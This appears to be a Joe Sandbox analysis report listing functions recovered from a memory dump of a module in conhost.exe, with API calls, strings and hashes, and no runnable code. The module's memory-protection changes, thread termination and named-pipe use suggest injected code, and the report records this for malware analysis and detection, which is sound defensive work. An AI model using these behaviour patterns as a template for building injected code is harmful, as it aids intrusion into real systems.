Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 0b088f540fd11a242bf5ed11a0688925eae4fc9c5e1027f6e02c8b9018dba42d
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: F681F330600F448AFFD0AB6D94813E97297EB85B82F444517AA0857796FB7AC8C187D3

Function 000001D547839AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,?,?,000001D547839C6B,?,?,?,000001D54783945C,?,?,?,?,000001D547838F65), ref: 000001D547839B31
GetLastError.KERNEL32(?,?,?,000001D547839C6B,?,?,?,000001D54783945C,?,?,?,?,000001D547838F65), ref: 000001D547839B3F
LoadLibraryExW.KERNEL32(?,?,?,000001D547839C6B,?,?,?,000001D54783945C,?,?,?,?,000001D547838F65), ref: 000001D547839B69
FreeLibrary.KERNEL32(?,?,?,000001D547839C6B,?,?,?,000001D54783945C,?,?,?,?,000001D547838F65), ref: 000001D547839BD7
GetProcAddress.KERNEL32(?,?,?,000001D547839C6B,?,?,?,000001D54783945C,?,?,?,?,000001D547838F65), ref: 000001D547839BE3

Strings

api-ms-, xrefs: 000001D547839B51

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: f6b1f83d3376f98310e04ef594924cde0fae5f3e4a6090de5d01db86681f1e78
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 6C31A631312F50D1EF919B1A98007E92396FB54BA6F590626DD1D4BB90FF79C4C4C392

Function 000001D547843400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001D547843431
GetLastError.KERNEL32 ref: 000001D54784343D
CloseHandle.KERNEL32 ref: 000001D547843455
CreateFileW.KERNEL32 ref: 000001D547843480
WriteConsoleW.KERNEL32 ref: 000001D54784349F

Strings

CONOUT$, xrefs: 000001D547843461

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 29b9a6bb16e762acf3558bb1cc44f90fff6a9b0d451809d6113de5222afbb47b
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: AC11B235310F4082EB918B52E86479967B2F398FE6F400216EA5E87B94FFB8C4848785

Function 000001D547836270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001D5478362AB
GetThreadContext.KERNEL32 ref: 000001D547836415

Part of subcall function 000001D5478360A0: GetCurrentThreadId.KERNEL32 ref: 000001D5478360A4

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: df58029f9c17943cc1a7629d7b1fae39821c6b04f4a76bfd06eda6e3c152df19
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 04D18836208F8881DFB09B1AE49439A77B1F388B89F100516EACD477A9EF7DC591CB41

Function 000001D547832098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001D5478320A6
TlsFree.KERNEL32 ref: 000001D54783225F
TlsFree.KERNEL32 ref: 000001D54783226B
TlsFree.KERNEL32 ref: 000001D547832277
TlsFree.KERNEL32 ref: 000001D547832283
TlsFree.KERNEL32 ref: 000001D54783228F

Part of subcall function 000001D547835E50: GetCurrentThreadId.KERNEL32 ref: 000001D547835E66

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 429cad06f89aa5166d88c2e9a9f068c213d91fc2dda977191faf4921205db992
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 1851C471201F4595EF85DB2CED602D823A3FB0475AF840917A52D067A5FF7AD9A8C3C2

Function 000001D5478335C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001D5478324D1), ref: 000001D5478335EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001D5478324D1), ref: 000001D5478335FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001D5478324D1), ref: 000001D547833673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001D5478324D1), ref: 000001D5478336D9
HeapFree.KERNEL32(?,?,?,?,?,000001D5478324D1), ref: 000001D5478336E7

Strings

$rbx-, xrefs: 000001D54783366C

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: da998feaeef9fbd6cfc6980b3972409d222f6e386a35c2d0e20bc4e393e26dbd
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 3531C132701F518BEF90DF1AE9403A9A3A2FB44B86F0940268F4807B55FF35C4E19781

Function 000001D54783C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001D54783C94F
SetLastError.KERNEL32 ref: 000001D54783C96E
FlsSetValue.KERNEL32 ref: 000001D54783C997
FlsSetValue.KERNEL32 ref: 000001D54783C9A8
FlsSetValue.KERNEL32 ref: 000001D54783C9B9

Part of subcall function 000001D54783D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001D54783674A), ref: 000001D54783D2B6
Part of subcall function 000001D54783D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001D54783674A), ref: 000001D54783D2C0

SetLastError.KERNEL32 ref: 000001D54783C9DC

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: ca561e3ba84922566feaa27e1804e8616e83f71c79818b2740b21a85d79b45b5
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 7E119E32300E4182FFD86B3968157EE2253EB947A2F944626AC26563C6FF29D4E143C2

Function 000001D547831A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001D547831A56
K32GetModuleFileNameExW.KERNEL32 ref: 000001D547831A74
PathFindFileNameW.SHLWAPI ref: 000001D547831A83
lstrlenW.KERNEL32 ref: 000001D547831A8F
StrCpyW.SHLWAPI ref: 000001D547831AA2
CloseHandle.KERNEL32 ref: 000001D547831AB0

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: e43388f0d349bfb9cb948225f1c68845ddb24615ce580c87793598f51c9b181e
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 60011735B04E4086EBA4DB16A85839963A2FB88FC2F8840369E9D53754FF79C985C781

Function 000001D547833E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001D547833AAC), ref: 000001D547833E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001D547833AAC), ref: 000001D547833E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001D547833AAC), ref: 000001D547833E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001D547833AAC), ref: 000001D547833E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001D547833AAC), ref: 000001D547833E9F
TerminateThread.KERNEL32(?,?,?,?,?,000001D547833AAC), ref: 000001D547833EAE

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 604c94c65485c8f7b2f8fe28d2d32f7b996376fd4bc0c4cefd50b5d4d5abdb90
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 13014C79611F4082FFB49B25E85879973A2FB49B56F04012ACA4D167A4FF3EC4C8C782

Function 000001D547831AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001D547831AF4
StrCmpNIW.SHLWAPI ref: 000001D547831B0E
lstrlenW.KERNEL32 ref: 000001D547831B1D
StrCpyW.SHLWAPI ref: 000001D547831B32

Strings

\\?\, xrefs: 000001D547831B02

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 5529549bcb931ee1db56c06ae122cf2c254e7c10ac8adecf296d93c0db9c5d88
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: F5F04F72704E8592EFA08B25F9843996362F744BDAF844026DA4946954FFADC6C8CB41

Function 000001D547833708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000001D54783275A), ref: 000001D54783372A
StrCpyW.SHLWAPI ref: 000001D54783373A
StrCatW.SHLWAPI ref: 000001D547833746
PathCombineW.SHLWAPI(?,?,00000000,000001D54783275A), ref: 000001D547833754

Strings

\\.\pipe\, xrefs: 000001D547833720

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: fc4bb72f0d8177e1aebc1a02a3610586181342e86f604fced0773697e5b476ed
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 82F08C74304F8082FF848B17B914199A762FB4AFC2F488032EE0A17B19FFACC4859781

Function 000001D54783B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001D54783B929
GetProcAddress.KERNEL32 ref: 000001D54783B93F
FreeLibrary.KERNEL32 ref: 000001D54783B95B

Strings

mscoree.dll, xrefs: 000001D54783B920
CorExitProcess, xrefs: 000001D54783B938

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 3c4cfdcd54d5cb6987fed57181fa8c2be4bfa8c9d0f71db7c7f353667a79abfc
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 69F0B471300F0181EF948B24E8943E92732EB89762F54032BDA6A465E4FF7DC4C8D782

Function 000001D547835810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001D547835896

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 184ce2cb98548fcf1365a0b25e7ffa2f97e11d737cd32f58e1f0f50a5dfd9d75
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: AF02EE32119F8486EBA0CB59F49039AB7A1F3C4795F100516EACE87BA8EF7DC494CB41

Function 000001D547832C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001D547832CAD
TlsGetValue.KERNEL32 ref: 000001D547832CBC
TlsGetValue.KERNEL32 ref: 000001D547832CCB
TlsSetValue.KERNEL32 ref: 000001D547832E0F
TlsSetValue.KERNEL32 ref: 000001D547832E1E
TlsSetValue.KERNEL32 ref: 000001D547832E2D

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: b863743d6eab41057e41ec0c6a57ab7ef3eb92a20c3e2ba2116d24359393bc4b
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 1851E636704E0087EFE4CB1AE454A9A73A2F788B96F50411ADE4A43754FF3AC985CB81

Function 000001D547832AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001D547832AE1
TlsGetValue.KERNEL32 ref: 000001D547832AF0
TlsGetValue.KERNEL32 ref: 000001D547832AFF
TlsSetValue.KERNEL32 ref: 000001D547832C3B
TlsSetValue.KERNEL32 ref: 000001D547832C4A
TlsSetValue.KERNEL32 ref: 000001D547832C59

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 637bff7cca7261af4b61bdbf9149b6001b6acaf3391027faa976c213a0adfbb4
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 6551D635614E41C7EFA4CF1AE45069A73A2F788B96F50411ADE4A43754FF3AC885CB81

Function 000001D547835E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001D547835E66

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: ca156e9b4eaca8ed8165aaa010d628b5846aa527650c93cb72248bc8d36cd39c
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 3D61AD36519F44C6EBA08B29E49435AB7E2F388745F100516FA8D57BA8EB7DC580CF42

Function 000001D547833EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001D547833A5B), ref: 000001D547833EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001D547833A5B), ref: 000001D547833F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001D547833A5B), ref: 000001D547833F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001D547833A5B), ref: 000001D547833F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001D547833A5B), ref: 000001D547833F68

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 4a204e8a0e568c5cbed904437671c5b77e371690febe649902ad7951922c9eef
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 38114F36605F4093EFA49B25E40429AA7B2FB45B85F440127DE4D03BA4FB7EC994C7C5

Function 000001D547838CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001D547838CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001D547838D62
RtlUnwindEx.NTDLL ref: 000001D547838DBC

Strings

csm, xrefs: 000001D547838D49

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

